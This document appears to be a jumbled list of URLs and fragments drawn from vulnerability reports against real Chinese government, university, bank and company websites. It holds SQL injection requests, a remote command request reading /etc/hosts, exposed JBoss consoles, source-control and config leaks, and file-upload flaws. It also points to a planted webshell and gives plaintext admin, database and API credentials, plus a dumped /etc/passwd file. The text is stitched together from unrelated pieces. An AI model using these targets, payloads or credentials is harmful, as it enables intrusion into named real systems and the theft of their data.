http://www.njfy.gov.cn:8080/courtApp/court/TamTrialManageAction_getTamTrialManageList.action http://www.hbxlgt.gov.cn/Admin/index.aspx http://117.41.240./49/50/51 http://117.41.240.50:8080/BaiHeTwoPortal/baihe/sendMessage.action inurl:http://oa.yindatech.com:8008/College_new/Login!login.action?username= http://oa.yindatech.com:8008/College_new/Login!login.action?username=15006&password=15006&server=yd http://oa.yindatech.com:2011/OA/Default_new.jsp http://dwoa.yindatech.com:8866/OA/Default_new.jsp http://oa.yindatech.com:2011/OA/Default_new.jsp inurl:/softwarer/ http://211.81.31.43:85/Softwarer//admin/login.asp http://210.31.3.245/softwarer//admin/login.asp http://111.123.226.31:89/softwarer/admin/login.asp http://rjt.czlib.net:8010/SoftWarer/admin/login.asp http://202.121.183.55:8000/softwarer//admin/login.asp http://202.195.60.180/SoftWarer//admin/login.asp http://61.144.43.228:8055/SoftWarer//admin/login.asp http://www.pdswater.com/ http://www.sydang.com/index.php?m=content&c=index&a=searchkf&id=15 http://www.sydang.com/index.php?m=content&c=index&a=searchkf&id=15 http://121.10.6.114/zscqzy/platform/login!login.action http://www.wcb.yn.gov.cn:8112/ http://www.wcb.yn.gov.cn:8112/jmx-console/ http://www.wcb.yn.gov.cn:8112/admin-console http://tb.nxjn.gov.cn:9090/fuel/login.do http://tb.nxjn.gov.cn:9090 http://www.zxysoft.com/ http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42 http://wasai.yy.com/baby/show.html?uid=1034638 http://wasai.yy.com。 www.randstatestats.org/forms.php?cat= http://www.zznyxxxt.gov.cn:6001/FQSSYSWEB/ http://www.zznyxxxt.gov.cn:6001 http://www.guqiu.com/ http://kc.njnu.edu.cn/rw/system/faq/default.aspx?action=update&id=8 http://class.hujiang.com/biz/apply http://f6.c.hjfile.cn/public/upload/201504/8442b5a8-0576-4c7a-9675-e207d85800a2.aspx http://**.**.**/Default.aspx_ http://www.huaxingedu.cn/PJ/Login.aspx user:admin pass:952148 http://218.22.17.229/pj/SchoolLogin.aspx user:admin pass:1234 http://218.22.143.68:8000/pj/SchoolLogin.aspx user:admin pass:135246 http://my.shopex.cn/ index.php/?c=findpwd&a=reset_pwd http://house.dzwww.com//broker.php?action=getbranch&companyid=2%20union%20select%201,2,table_name,4%20from%20information_schema.tables 3.newcar.dzwww.com/index.php?r=SellerPriceBrand/Index&bid=2&pid=8&city=158 http://wooyun.org/bugs/wooyun-2010-074095 http://qc.homeinns.com/QNPlatom/ http://qc.homeinns.com/NewQC/HotelInternalReportDetails.aspx http://oa.homeinns.com/Voucher/Tasks/TaskList.aspx http://qc.homeinns.com http://www.sdbzxz.com/Dynamic/View.aspx?ID=d7cfcd37-6c2b-4edd-b7bf-4f006583f616 http://m.zhuna.cn/wap/index.php/index/ydHotel?hotelid=14360&rid=56605&pid=23045&tm1=2015-04-12&tm2=2015-04-13&iscard=1&stat=&end=&backurl=http://m.zhuna.cn/wap/index.php/index/getHotelInfo/14360/2015-04-12/2015-04-13?type=1 http://www.fuli100.com.cn/AddressAdd.aspx?UserAddressID=1702 http://www.fuli100.com.cn/AddressAdd.aspx?UserAddressID=1701 http://www.ideacms.net http://www.ideacms.net/demo6/plug/user/login.asp Cookie:urole=%2D1 http://bbs.tianya.cn/post-129938-197-1.shtml http://bbs.tianya.cn/list-129938-1.shtml bbs.tianya.cn/post-123979-157-1.shtml http://changba.kuwo.cn/kge/st/SearchSinger?tag=%E6%B0%91%E6%97%8F http://manage.xinyour.com/ http://dict-mobile.iciba.com/interface/index.php?client=1&type=1&c=bilingual&m=getrecommendlist×tamp=1428905919&sign=a3c546418e8d8338&size=10&page=1&uid=&uuid=9ca70393ab364558a30ada73cb50982c&count=0&field=1,2,4,11&cid=241 http://www.ilvxing.com/ http://www.essfdc.gov.cn/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.hsfdc.com/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.tmfdc.gov.cn/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.wjfdc.gov.cn:81/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.ltxfdc.com/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.szfcsc.com/web/PubInfo/Ranklist.asp?rank=@@version&ord=1 http://www.stategrid.com.cn/ https://mail.stategrid.com.cn/ site:github.com http://61.178.83.56:8081/ http://61.178.83.56:8081/test.txt http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i9 http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i8 http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i6 http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i2 http://zhaopin.eximbank.gov.cn/user/ResumeViewFrm.aspx?id=49345&leibie=100101 site:muc.edu.cn author:daMao http://222.76.124.135/ http://www.1337day.com/exploit/23480 admin-console.war/]$ http://www.jslgroup.com/admin/index.html b2b.hc360.com/supplyself/241167445.html http://www.baidu.com/s?wd=b2b.hc360.com%2Fsupplyself%2F241167445.html view-source:http://b2b.hc360.com/supplyself/241167445.html http://1.93.0.215:7001/drpengcloudportal/cloud_mall/getMonitorData.action http://tiancheng.sinosteel.com/cms_app/Login.aspx http://cxsq.suqian.gov.cn/sqscms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001 http://www.yirendai.com/ask/questiondetail.action?id=15383 www.cnvd.org.cn的保存密码为例。 http://www.hnhhszx.com/admin/login.html http://221.10.252.208/ aais15.nkfust.edu.tw/resin-admin http://113.108.96.136/jxpg_gsxzgl/page/login.action http://www.sh.118100.cn/member/userLogin/execute.action http://www.ztauto.com/ http://www.ztauto.com/index.php?g=Search&a=detail_chexing&FactoryID=118 http://erm-kbs.ruc.edu.cn/ http://erm-kbs.ruc.edu.cn:80/Ext/WxDetail.aspx?type=50&id=d9ef9331-1aae-46fd-85f5-956711b5f083 http://**.**.**/Ali_ht/index/index http://**.**.**/ali_ht/index/index http://jack.douban.com/prompt/100382/ position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.wooyun.org/ http://localhost/test.html http://www.lvtu100.com:8081/UserCenter/ContactMod?id=8125 http://www.lvtu100.com:8081/UserCenter/ContactMod?id=81210 http://www.lvtu100.com:8081/UserCenter/ContactMod?id=810 www.foshanbank.cn http://www.foshanbank.cn/wy.txt www.lvtu100.com:8081 http://www.lvtu100.com:8081 http://shaiwu.smzdm.com/detail_preview/198007 http://lbs.189.cn/kindeditor/php/file_manager_json.php?path=/ http://lbs.189.cn/kindeditor/php/demo.php http://lbs.189.cn/kindeditor/php/upload_json.php?dir=file http://lbs.189.cn/kindeditor/php/upload_json.php?dir=file http://www.qjtj.com/bb_show.php?lm2=6&ssid=358 https://122.96.155.202/ http://xgc.ylsy.edu.cn http://xgc.ylsy.edu.cn/news/html/?840.html http://xgc.ylsy.edu.cn/news/html/index.php?id=840 Sea:/home/sea# http://xgc.ylsy.edu.cn/news/html/index.php?id=840 http://sqlmap.org www.wooyun.org/bugs/wooyun-2015-0106908)一样。 http://mail.qq.com/zh_CN/htmledition/swf/uploader1d35b7.swf http://mail.qq.com/cgi-bin/login?fun=psaread http://set1.mail.qq.com/cgi-bin/mail_list?sid={SID}&page=0 http://set1.mail.qq.com/cgi-bin/laddr_lastlist?sid={SID}&t=addr_datanew&category=hot http://set1.mail.qq.com/cgi-bin/compose_send?sid={SID www.ncu.edu.tw http://jydd.zjedu.org/common/info_list.php?page=2&colsn=007000000 http://zeaie.zjedu.org/common/info_list.php?page=1&colsn=008000000 http://yw.zjedu.org/common/info_list.php?page=2&colsn=002000000 URL:http://jydd.zjedu.org/admin/main.html http://221.226.93.180/江苏邮政微信管理平台 http://118.26.230.56:20000/ http://ios.mama.cn http://59.151.39.146:8000 http://59.151.39.146:8000/invoker/JMXInvokerServlet http://www.cs-airport.com/CSWap/AirlineDetailsW.aspx?id=24 http://xian.weidiancai.com/index.jsp http://support.m41s.com http://cs.m41s.com http://data.m41s.com http://rzpt.smesd.gov.cn/corpinfos.jsp?id=9EB1A84C78AF4EEA9A56924632B594BD* http://sqlmap.org http://59.173.9.165:8018/ http://www.yilibabyclub.com/FindPwd.aspx http://cs.focus.cn:80/ http://cs.focus.cn:80/ http://www.thehanshow.com/ https://ticket.wandaperformance.com http://monk.uboxol.com/config/getClientStartTimes?idfa=1&os=a http://zhixin.baidu.com/My/Index?module=onesite#health/comment http://oneapm.udesk.cn这个地址上,我在在这里提交一个单工,然后在提交后的单工下进行回复,回复的时候我又注册了一个小号进行测试,在回复地址上我们进行了抓包 http://27.223.70.96:8080/index.html http://27.223.70.96:8080//member/address_edit.html?addressid=183 http://27.223.70.96:8080//member/address_edit.html?addressid=181 http://www.sqzjg.com/ewebeditor/Admin_Login888.asp admin:admin http://www.sqzjg.com/Zjhg.asp?Bigid=1 http://jifenshangcheng.m.xunlei.com/cgi-bin/integra_info?userId=219509333 http://27.223.70.32:8080/security/loginInit.action http://sys.xunku.org http://192.168.1.200/muxjp.php ffff:0:f101::188 http://vip.luoxin.cn:6666/logout.action http://59.46.163.20:8081 http://www.incoindex.com/incoindex/usermanager/tologin.action http://co-diovan.medlive.cn http://59.41.9.191/toLogin.action rdp://218.240.46.181:3389 http://www.xmgjj.gov.cn/xzzx/zsgjj/201403/t20140331_10088124.htm http://222.76.242.141/HousingFund/personalAccount/personalAccountDetail.html?cust_acct=公积金账号 http://222.76.242.141/HousingFund/personalAccount/personalAccount.html?id_no=个人身份证号 http://**.**.**/_ http://**.**.**/invoker/JMXInvokerServlet_ http://update2.9797168.com/ http://update2.9797168.com/index.php?c=login http://www.sogoke.com http://www.tmfdc.gov.cn:2901/checklogin.asp http://www.essfdc.gov.cn:2301/checklogin.asp http://www.ltxfdc.com:5201/checklogin.asp http://www.szfcsc.com:81/checklogin.asp http://www.xysfdc.com:5601/checklogin.asp http://www.bsfcba.com/checklogin.asp http://www.bsfctl.com/checklogin.asp http://www.bsfclly.com/checklogin.asp http://www.bsfcll.com/checklogin.asp http://www.601601.com http://zs.dhu.edu.cn/dhuzs/EMSQuery.aspx http://lsm.szszyy.cn/?fid=index http://yian.szszyy.cn/?fid=notice&id=1 http://www.gamekin.cn/gk2/new.asp?id=2 intitle:Powered http://www.51utx.com/new.asp?id=2 http://www.bdhgl.com/new.asp?id=2 http://www.gamekin.cn/gk2/new.asp?id=2 http://www.zalvyou.com/new.asp?id=2 http://www.czdfgl.com/new.asp?id=2 http://www.66lxs.com/new.asp?id=3 http://www.hncy-ts.com/new.asp?id=2 http://www.ly0855.com/new.asp?id=2 http://www.jymjly.com/new.asp?id=130 http://www.bsszts.com/new.asp?id=2 http://www.tcxzh.com/new.asp?id=2 http://www.yyczl.com/new.asp?id=2 http://6028808.net/new.asp?id=2 http://fjctsnp.com/new.asp?id=2 http://www.czdfgl.com/new.asp?id=97 http://www.0898666.com/new.asp?id=2 http://www.hncy-ts.com/new.asp?id=2 http://www.zl168.cn/new.asp?id=2 http://www.citsxh.com/new.asp?id=2 http://www.gd98.com/new.asp?id=4 video.chaoxing.com/web.config www.ssvideo.cn/Web.config http://cysp.hebfda.gov.cn:7280/spcy/login!logout.do http://localhost/phpok/admin.php?c=tpl&f=edit_save&id=1&folder=%2F&title=book_list.html http://think.lenovo.com.cn/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&search_time=&keyword=&docid=&categoryID=&page=710 http://sykx.cup.edu.cn/sykxcn/ch/author/check_user.aspx?user_name=ok http://xuebao.sxmu.edu.cn/ch/author/check_user.aspx?user_name=ok http://202.207.192.120/ch/author/check_user.aspx?user_name=ok http://qbxb.alljournals.net.cn/ch/author/check_user.aspx?user_name=ok http://journal.geomech.ac.cn/ch/author/check_user.aspx?user_name=1 http://www.zrgold.com/login/toLogin.action http://co-diovan.medlive.cn/?type=1 http://ui.jiayuan.com/bear/ http://www.juzir.com/print.aspx?i=0408800 http://www.juzir.com/print.aspx?i=3330100 http://118.26.188.146/ http://zhtyg.sjtu.edu.cn:8080/uc_server/admin.php http://www.yichao.cn/member/OrderDetail.aspx?OrderID=231881 http://应用名.sturgeon.mopaas.com/.git/config http://www.heagri.gov.cn/hbagri/web_zy/nyfz/more.jsp?curPage=2&key=1&lanmu_id=347 http://q.yoger.com.cn/ http://q.yoger.com.cn/actions.php http://cw.syu.edu.cn:8080/kfweb/admin/admin_loginInfo.aspx http://cw.syu.edu.cn:8080/KfWeb/ http://www.powercreator.com.cn/ http://119.60.3.156:8091/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://202.202.111.184/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://www.mbastudy.cn/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://58.54.132.28:8080/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://218.92.71.5:1182/Theme/3/OpenCourse.aspx?CourseID=1&ProjectID=0 http://www.shhanyu.com/ADMIN/main.asp http://www.tba.gov.cn/SUZHOUJU/board_show.asp?id=72 http://27.223.70.96:8080/index.html http://202.97.194.220:7017/dqjg/dqjg/common/attachmentFileAction!download.action http://www.lyfzb.gov.cn/admin/default.asp http://120.86.191.171/system/homeset/homeset!displayOtherById.action https://github.com/NJLOVER/jettyMVC/blob/11247feb70b5160b0367f2051ae7874c493ffd72/src/main/resources/mail.config.xml https://www.cmi.chinamobile.com/CPortal/hacked.jsp http://www.airsafe.com.cn/download.action http://bkszs.sus.edu.cn:8004/zsxt/ http://bkszs.sus.edu.cn:8004/zsxt/editor/admin/login.jsp http://www.jzj.cn/ http://116.55.227.74/ http://mba.nuaa.edu.cn/wwwroot.rar http://m.yoger.com.cn http://video.chinaqy.info/WebUtil/system/LiveProg-liveProgram.action http://fzgh.jsut.edu.cn/ http://fzgh.jsut.edu.cn/WebSiteManger/AdminLoginV1.aspx http://60.190.203.25:59999/templates/index/hrlogon.jsp http://ehr.topsearch.com.hk/templates/index/hrlogon.jsp http://221.123.128.41/templates/index/hrlogon.jsp http://hr.bjn3cc.com/templates/index/hrlogon.jsp http://202.205.112.6/templates/index/hrlogon.jsp http://27.112.9.28:8081/templates/index/hrlogon.jsp http://intranet.topsearch.com.hk/templates/index/hrlogon.jsp http://218.64.68.150:8888/templates/index/hrlogon.jsp http://hr.airport.gx.cn:8089/templates/index/hrlogon.jsp http://61.133.218.206:8888/templates/index/hrlogon.jsp http://ehr.XXXX.com.cn/templates/index/mainpanel.do?b_query=link&module=-1 http://124.207.117.120/wsxy-zs/us/toLogin.action http://www.chinafoundation.org.cn/ProjectLibrary-New/system/loginIndex.action http://hbs.qhdzjz.org.cn:8080/jdxt_qhd/toLogin.action https://sso.letv.com/user/bindUserPwd http://211.142.89.82:8000/login.aspx http://221.232.128.166:8080/Frame/index.htm http://moxian.com/main http://124.133.3.232:8080/Zhsqxh.aspx?xm=&sfhm= http://www.yonyou.net.cn/fa.asp?id=731 http://jfk.iiyi.com/list/clist/?ctype= http://jfk.iiyi.com/course/get_rec_list http://**.**.**/defaultroot/voiture_manager/Voituregetsource.jspvoitureid=696360&type=chgMotorMan_ http://**.**.**/defaultroot/govezoffice/gov_documentmanager/govdocumentmanager_judge.jspnumId=1 http://**.**.**/defaultroot/InfoViewIframeAction.dohistoryId=1&action=delHistory URL:http://so.iiyi.com/*?jpg/search/do http://so.iiyi.com/http://wenku.baidu.com/search?word=%CE%C4%BC%FE%B0%FC%BA%AC&lm=0&od=0&fr=top_home?jpg/search/do http://so.iiyi.com/bbs/search/do?author=&d=30&fbd=1&kw=1&mp[]=rate&mp[]=attachment&mp[]=digest&mp[]=recommends http://www.fhyx.com/ http://i.cig.com.cn/ http://58.51.197.175:81 http://58.51.197.175:81/invoker/JMXInvokerServlet http://58.19.178.156:81 http://58.19.178.156:81/invoker/JMXInvokerServlet http://58.19.178.156:81/myname/index.jsp site:cdrcb.com http://px.cdrcb.com:8088 https://mail.cdrcb.com/owa/ http://hktckln.hktc.edb.gov.hk/success/index.php?select1=HK15-033 www.96877.net http://user.fangjia.com/fangjiatong2/feedback/index http://signup.sdx.js.cn/SIGNUP/sysset/comm/SysSetAction_exam.action http://upcdn.b0.upaiyun.com/libs/jquery/jquery-2.0.3.min.js http://fast.ele.me:89/verifyLogin.do ftp://36.32.16.41/ http://admin.yihu.com/ http://user.tgbus.com/login.html,发现是有验证码的,而且验证码是滑动的那种,这个绕过就不说了 http://www.tgbus.com,发现主站是没有验证码的 http://14.204.84.94:8080/ucenter/index.jsp http://www.fhyx.com/ http://www.fhyx.com/account/forget_passwd.html Shell:http://fast.ele.me/nullc.jsp http://hy.hldf.org.cn/common/registerAction!regRedir.action http://114.80.121.174/index.php http://www.hrssgz.gov.cn/vsgzhr/AssumeHtml/JL-00000001.html http://www.txredcross.org http://gj.517na.com/ http://th.517na.com/ http://gq.517na.com/ http://user.517na.com/ http://jd.517na.com/ http://yc.517na.com/ http://sms.517na.com/SMSLogin.aspx http://stat.daoyoudao.com:80/ http://www.jqsoft.net/ http://60.171.157.123:8002/ScriptResource.axd?d=kNuYg8_hYRCca_hpe1xIILHmrMI_KvKCxS41uOsngxQAAAAAAAAAAAAAAAAAAAAA0 http://106.37.172.5:8080/entrance.do jboss-4.2.3.GA/server/default/./deploy/case.war/ http://zxl.91yong.com/uc/login.html http://www.yoger.com.cn/ URL:http://peixun.iiyi.com/goods/compare http://peixun.iiyi.com/goods/list http://www.osghcinemas.com/ http://think.lenovo.com.cn/webdrivercd/four.aspx?sn=428223CR9HFL87里的JS代码进行分析,摸清楚activex这些函数的用法后,可知结合该控件所提供的AppendExtraDriver、DownloadDriver、GetCurrentDriverPath以及OpenItemFilePath函数可以导致远程命令执行。 http://iminte01.chanapp.chanjet.com:9090/login.jsp?url=%2Findex.jsp http://t3online.chanjet.com/yyexam/jsp/sm/ http://parterner.chanjet.com/admin/Default.aspx http://wiki3.rd.chanjet.com/login.action?os_destination=%2Findex.action http://wiki.rd.chanjet.com/login.action;jsessionid=A0E0E5BD391F33B4F90021EC48F7E512?os_destination=%2Findex.action http://prm.chanjet.com/login/login.php http://www.chanpay.com/common/thirdUserLogin.do?action=toThirdCspLoginPage http://cm.chanpay.com:9999/ http://cm.chanpay.com/agentLogin.jsp http://123.126.31.20/ http://123.126.31.20/.svn/entries http://123.126.31.20/app/.svn/entries com.netease.mail/shared_prefs/下的android-lockpattern-xxx.xml中保存着邮箱大师手势密码配置 http://www.zhulang.com/login/index.html这个接口,就是主站的登陆接口,来到之后可以看到没有验证码和任何登陆限制,以为要输入错误几次用户名和密码才会跳出来,但是试了试还是完全没有任何登陆限制 http://oa.cofco-keystone.com/login.aspx http://irmail.nd.com.cn/index.php?lang=eng http://cd.aipu.com/m_news.php?id= http://cd.aipu.com/weixiu/?are= http://27.223.70.96:8080/ http://www.mczb.gov.cn/UserSecurityController.do?method=checkSecurity&userId=1 http://www.mczb.gov.cn/UserSecurityController.do?method=checkSecurity&userId=1 https://xyk.cebbank.com/mycard/setting/updAddress.htm?id=xxx www.umeng.com/api/feedback_request_proxy/?appkey=4fe11bd85270156dd8000014&path=10.18.10.92 http://**.**.**/ctc/servlet/ConfigServletparam=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/hosts http://223.100.112.165 http://wooyun.org/bugs/wooyun-2010-093779 http://i.maxthon.cn/data/showlist.html https://github.com/chenyurenscau/XmlDemo/blob/4e87a95c0bb89275fda995b2f56f730d72c3eaa1/pay-service-admin/src/main/resources/pay-admin/spring-mail-service.xml http://wooyun.org/bugs/wooyun-2015-098908 http://wooyun.org/bugs/wooyun-2015-090308 jdbc:mysql://10.32.3.48:3306/acedb?characterEncoding=utf8 jdbc:mysql://127.0.0.1:3306/aceapp jdbc:mysql://127.0.0.1:3306/ace?characterEncoding=gbk&noAccessToProcedureBodies=true http://www.appstar.com.cn/bbs/uc_server http://sdxjnyjc.sph.com.cn/存在iis7解析漏洞 http://sdxjnyjc.sph.com.cn/ckfinder/ckfinder.html处任意上传图片 http://sdxjnyjc.sph.com.cn/Upload/files/1%281%29.jpg/.php可任意执行php文件 user:root password:jiaketao password:sql.sph http://lib.qfnu.edu.cn:808/idl/admin/index.htm http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC http://vanbao.wlwservice.com/system/goSyslogin.action http://www.17u.net/ http://marketing.touzhu.cn/main.aspx登陆处存在sql注入漏洞。sa权限。mssql2008。跨裤很多。 http://zaocan.meituan.com/shared/apply?mobile=手机号&sharedId=分享id&type=1 http://robot.lenovo.com.cn/lenovo/think.jsp?channel=think http://cjctb.ccc.gov.cn:8080/Login/Login.aspx http://120.195.108.123:8080/ucenter/ http://61.182.231.214:8080/ http://61.182.231.214:8080/invoker/JMXInvokerServlet http://www.tbmmis.com/Main.aspx https://github.com/ytlviv/goweb/blob/6786abdc8530854c717d5f688666f427ae614a00/oa/.svn/pristine/a8/a86b7c3bbf16b2ac4f799e963ebea26fee57b6f1.svn-base http://cop.chanjet.com https://github.com/koudailicai/koudai/blob/bc9dceb7431eae560e94167a48bbc8e5e891e903/common/config/main.php https://github.com/koudailicai/koudai/blob/bc9dceb7431eae560e94167a48bbc8e5e891e903/environments/pre_release/common/config/main-local.php https://github.com/koudailicai/koudai/blob/master/.svn/entries http://oa.chanjet.com/AD/ResetPassword.aspx http://111.205.116.157:8080/MRDMS/system/unitAction!unitTree.action http://ftdy.cntest.com/system/userQuestionsAction!intGetPWDByUserQuestions.action http://web.mobset.com/SDK/Sms_Send.asp?CorpID=116497&LoginName=deyu&passwd=768717 jdbc:oracle:thin:@192.168.6.47:1521:ora92 http://**.**.**/uc_server/ http://114.104.156.250/Bidu_Books_Detail.aspx?id=513567 http://122.224.130.18:86/Bidu_Books_Detail.aspx?id=321327 http://www.zixilib.com:8008/Bidu_Books_Detail.aspx?id=362732 http://220.180.89.90:8081/Bidu_Books_Detail.aspx?id=321327 http://221.1.218.166:81/Bidu_Books_Detail.aspx?id=321327 http://222.68.193.118/ http://222.68.193.118/jmx-console https://counter.yongjinbao.com.cn https://counter.yongjinbao.com.cn/ajaxUserLogin\!ajaxUserLogin.action http://t.96335.com/ http://116.10.197.141:8081/shop/index.php http://t.96335.com/circle/index.php?act=cut&op=pic_cut http://t.96335.com/circle/index.php?act=cut&op=pic_cut http://www.lib.swjtu.edu.cn/Default.aspx http://222.36.3.60/ttweb/index.jsp http://222.41.213.236/invoker/JMXInvokerServlet http://www.utourworld.com/findpwd/ http://www.utourworld.com/usercenter/LoginUser.aspx http://www.utourworld.com/usercenter/AddCommonVisitor.aspx?Id=194440&keepThis=true&TB_iframe=true&height=230&width=550 http://www.utourworld.com/usercenter/AddCommonVisitor.aspx?Id=194439&keepThis=true&TB_iframe=true&height=230&width=550 http://www.utourworld.com/usercenter/AddCommonVisitor.aspx?Id=194438&keepThis=true&TB_iframe=true&height=230&width=550 http://doogua.dangdang.com/book/search/ post:class=&text=1&type=all root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin checkos:x:500:500::/home/checkos:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin mysql:x:502:502::/var/lib/mysql:/bin/bash zabbix:x:503:503::/home/zabbix:/bin/bash memcached:x:101:103:Memcached daemon:/var/run/memcached:/sbin/nologin http://my.0-6.com/admin/app/vote/index.do http://my.0-6.com/admin/ http://l.airchina.com.cn在线学习平台,点击忘记密码,会提示:“用户名为国航10位员工编号; http://hdjw.hnu.cn/p.rar http://hdjw.hnu.cn/xscj/Stu_MyScore.aspx http://shopm.qztelecom.com/loginAction!login.action http://passport2.chaoxing.com/login http://222.73.244.122/ http://222.73.244.122/jmx-console/ http://222.73.244.122/jmx-console/或 http://222.73.244.122/invoker/JMXInvokerServlet http://www.chnmuseum.cn/tabid/462/Default.aspx http://wooyun.org/bugs/wooyun-2010-028562之前有报过,,, http://www.imeach.com/giftList.php?catid=18&only=&order=&score=&sort= position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.baidu.com/ http://localhost/csrf.php http://my.0-6.com:80/admin/App/Vote/save.do http://www.jxvw.com/ http://www.leyou.com.cn/bbs https://mail.leyou.com.cn/owa/ http://www.3need.com/index.php?controller=site&action=payok&out_trade_no=充值订单号 http://www.3need.com/index.php?controller=site&action=payok&out_trade_no=3need1429095660 http://**.**.**/ME/Login.aspxtype=1 http://222.33.193.178/ http://218.90.162.66:8015/ProductShow.asp?ID=201 http://219.146.62.244:8088/ http://www.bioknow.net/portal/root/website_bioknow/index.jsp http://www.bionovo.com.cn/portal/root/gcp_project_bionovo/gyxt.jsp?id=22577155 http://202.38.77.223:8000/portal/root/lims_std/gyxt.jsp?id=232783874 http://218.75.123.195:8181/portal/root/lcky1/gyxt.jsp?id=12713988 http://www.gzboji-edc.com/portal/root/eip_cro/gyxt.jsp?id=9240576 http://202.197.66.228/portal/root/data_analysis/gyxt.jsp?id=262146 http://222.68.193.118 http://222.68.193.118/mana/edit/uploadattcah.jsp(可直接上传jsp) http://222.68.193.118/mana/edit/attach_upload.jsp(可直接上传jsp) http://www.mynj.gov.cn/jmx-console/问题已经修复 http://221.226.11.85/ http://221.226.11.85/invoker/JMXInvokerServlet http://www.xpshop.cn http://enframe.xpshop.cn/ http://125.88.10.165/WebAttend/sys/login.aspx http://yuyue.mama.cn http://202.106.152.92:8080/asop/logout.asop?userId=38,每次生成的userid是不同的。点了退出之后抓包获取userid: http://58.215.139.37:9200/_status http://58.215.139.37:9200/_nodes http://58.215.139.37:9200/_cluster/health http://bbs.51idc.com/ http://www.51idc.com/.svn/entries http://www.infowarelab.com/ http://www.olo.cn/http://www.olo.cn/jmx-console/ http://114.251.242.128 http://zhaopin.sme.gov.cn/ www.scjg.com.cn http://**.**.**/zlqc_index/index.jsp_ http://**.**.**/jmx-console/_ http://**.**.**/invoker/JMXInvokerServlet_ http://www.jstc.gov.cn/Page/System/NewsAllList.aspx?KeyWord=11 http://www.yingjiesheng.com/ http://demo.ourphp.net/?cn-job-7.html,其中的cn-job-7.html会被解析成cn、job、7三个参数,这里的cn参数存在注入漏洞,而整个ourphp的网站几乎都是这种类型的url。 http://demo.ourphp.net/?cn-job-7.html http://demo.ourphp.net/?cn-shop.html http://119.7.200.19:8080/OAapp/WebObjects/OAapp.woa http://git.wcf.srnpr.com/scm/svn/svnmall/ofbiz/applications/core/config/mail.properties http://localhost:8080 http://k.cn//.svn/entries http://k.cn/editor/upload.html http://k.cn/attachment/editor/20150415103423_2145.php http://124.115.170.169/searchweb/search.jsp http://124.115.170.169/cssweb http://124.115.170.169/searchweb/template/basic/images/s2.jsp http://124.115.170.169/searchweb/template不变 https://mail.tcl.com/ http://ekp.haierre.com/login/Login.jsp?logintype=1&message= http://ekp.haierre.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://desktop.it.meiyou.com http://220.179.122.101/ http://220.179.122.101//jmx-console/ http://www.70.com/.svn/entries http://219.143.248.244/index.do http://219.143.248.244/invoker/JMXInvokerServlet http://www.dyfdc.net.cn/PubInfo/AreaAnalysis.asp?Qrylx=gymj&Qryszqx= http://www.yafcj.com/PubInfo/AreaAnalysis.asp?Qrylx=gymj&Qryszqx= http://www.szfcsc.com/web/pubinfo/Analysis_Area.asp?Qryszqx= http://221.234.43.179:7202/PubInfo/AreaAnalysis.asp?Qryszqx= http://www.wtxfcj.com/pubinfo/AreaAnalysis.asp?Qryszqx= http://www.hsfdc.com/web/pubinfo/Analysis_Area.asp?Qryszqx= http://www.bsfcba.com/setting/xgmm_dowith.asp http://www.szfcsc.com:81/setting/xgmm_dowith.asp http://www.bsfctd.com/setting/xgmm_dowith.asp http://www.bsfcll.com/setting/xgmm_dowith.asp http://www.bsfclly.com/setting/xgmm_dowith.asp http://www.bsfcxl.com/setting/xgmm_dowith.asp http://www.bsfctl.com/setting/xgmm_dowith.asp http://www.bsfcjx.com/setting/xgmm_dowith.asp 